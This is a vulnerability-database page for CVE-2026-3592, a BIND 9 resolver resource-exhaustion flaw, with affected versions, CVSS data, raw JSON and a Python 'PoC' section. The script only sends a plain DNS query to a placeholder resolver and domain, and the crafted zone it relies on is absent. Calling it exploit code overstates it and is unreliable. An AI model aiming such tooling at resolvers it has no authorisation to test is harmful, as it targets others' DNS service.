Security Vulnerability Report
中文
CVE-2026-3592 CVSS 5.3 MEDIUM

CVE-2026-3592

Published: 2026-05-20 13:16:24
Last Modified: 2026-05-20 14:04:57
Source: [email protected]

Description

BIND resolvers are vulnerable to an amplified resource consumption/exhaustion attack. If a victim resolver makes a query to a specially crafted zone, the resolver will consume disproportionate resources. This issue affects BIND 9 versions 9.11.0 through 9.16.50, 9.18.0 through 9.18.48, 9.20.0 through 9.20.22, 9.21.0 through 9.21.21, 9.11.3-S1 through 9.16.50-S1, 9.18.11-S1 through 9.18.48-S1, and 9.20.9-S1 through 9.20.22-S1.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

BIND 9.11.0 - 9.16.50
BIND 9.18.0 - 9.18.48
BIND 9.20.0 - 9.20.22
BIND 9.21.0 - 9.21.21
BIND 9.11.3-S1 - 9.16.50-S1
BIND 9.18.11-S1 - 9.18.48-S1
BIND 9.20.9-S1 - 9.20.22-S1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import dns.query import dns.message # PoC Concept for CVE-2026-3592 # This script demonstrates sending a query to a resolver that is expected to trigger the resource consumption. # The target zone must be specifically crafted to exploit the vulnerability. def trigger_vulnerability(target_resolver_ip, crafted_domain): # Create a DNS query for the crafted domain query = dns.message.make_query(crafted_domain, 'A') try: # Send the query to the vulnerable resolver response = dns.query.udp(query, target_resolver_ip, timeout=5) print(f"Query sent to {target_resolver_ip} for {crafted_domain}") print(f"Response received: {response}") except Exception as e: print(f"Error occurred: {e}") if __name__ == "__main__": # Replace with the IP of the vulnerable BIND resolver # Replace with the domain hosted in the crafted zone target_ip = "192.168.1.100" malicious_domain = "example.vuln.zone" trigger_vulnerability(target_ip, malicious_domain)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-3592", "sourceIdentifier": "[email protected]", "published": "2026-05-20T13:16:23.790", "lastModified": "2026-05-20T14:04:57.320", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "BIND resolvers are vulnerable to an amplified resource consumption/exhaustion attack. If a victim resolver makes a query to a specially crafted zone, the resolver will consume disproportionate resources.\nThis issue affects BIND 9 versions 9.11.0 through 9.16.50, 9.18.0 through 9.18.48, 9.20.0 through 9.20.22, 9.21.0 through 9.21.21, 9.11.3-S1 through 9.16.50-S1, 9.18.11-S1 through 9.18.48-S1, and 9.20.9-S1 through 9.20.22-S1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-408"}]}], "references": [{"url": "https://downloads.isc.org/isc/bind9/9.18.49", "source": "[email protected]"}, {"url": "https://downloads.isc.org/isc/bind9/9.20.23", "source": "[email protected]"}, {"url": "https://downloads.isc.org/isc/bind9/9.21.22", "source": "[email protected]"}, {"url": "https://kb.isc.org/docs/cve-2026-3592", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.